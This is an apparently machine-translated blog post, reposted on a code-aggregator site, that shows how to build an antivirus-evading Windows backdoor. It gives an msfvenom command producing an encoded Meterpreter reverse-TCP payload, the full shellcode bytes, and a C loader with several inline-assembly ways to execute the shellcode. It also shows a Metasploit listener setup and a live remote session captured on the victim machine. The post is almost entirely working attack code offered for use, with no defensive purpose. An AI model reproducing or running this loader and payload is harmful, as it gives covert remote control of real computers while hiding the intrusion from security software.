Payload achieve separation of the back door to avoid killing

Others 2019-08-10 21:02:42 views: null

As we all know, the current antivirus software antivirus principle there are three main ways, one based on the feature, based on behavior, based on cloud killing, killing some of the characteristics of cloud basically can be summarized as signature killing, no matter what kind of anti-virus software, checks the PE header, especially when the backdoor larger, more easily killing.

Next we will use ShellCode and actuator separate ways to achieve free to kill

By C language compiler back door

1. First, use the msfvenomcommand to generate a short shellcode, here designated as the connection address IP=192.168.1.7,PORT=8888, when executing shellcode generation command screen output will be some hexadecimal text, the text is actually encoded in the form of machine code, the following is an explanation of the parameters .

[root@localhost ~]# msfvenom -a x86 --platform Windows \
>                              -p windows/meterpreter/reverse_tcp \
>                              -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

-a              #指定payload目标框架
--platform      #指定payload的目标平台
-p, --payload   #指定需要使用的payload(攻击荷载)
-f, --format    #指定输出格式 (使用 --help-formats 来获取msf)
-b '\x00\x0b'   #规避特殊字符串

2. Copy the code above ShellCode down, open VS Express编译器, and write the following C code used here in the form of inline assembly code that calls this ShellCode.

#include <stdio.h>
#include <windows.h>

//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO")                                     // 减小编译体积
#pragma comment(linker, "/section:.data,RWE")                                 // 启用数据段可读写

unsigned char shellcode[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

int main(int argc, char **argv)
{
    __asm
    {
        lea eax, shellcode
            call eax
    }
    return 0;
}

Also out this compilation form above, here I have compiled some of the other calls ShellCode code.

    //第1种方法     
    void RunShellCode_2()  
    {  
        ((void(*)(void))&shellcode)();  
    }  
      
    //第2种方法  
    void RunShellCode_3()  
    {  
        __asm  
        {  
            lea eax, shellcode;  
            jmp eax;  
        }  
    }  
      
    //第3种方法     
    void RunShellCode_4()  
    {  
        __asm  
        {  
            mov eax, offset shellcode;  
            jmp eax;  
        }  
    }  
      
    //第4种方法     
    void RunShellCode_5()  
    {  
        __asm  
        {  
            mov eax, offset shellcode;  
            _emit 0xFF;  
            _emit 0xE0;  
        }  
    }

3. In the MFS control panel, start the listener.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888

Start our shellcode codes, you can see a bounce back shell.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805) at 2019-03-20 00:03:41 -0400

meterpreter > sysinfo
Computer        : lyshark
OS              : Windows 10 (Build 19999).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

By C # language compiler back door

By Python language compiler back door

Guess you like

Origin www.cnblogs.com/LyShark/p/11331476.html
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com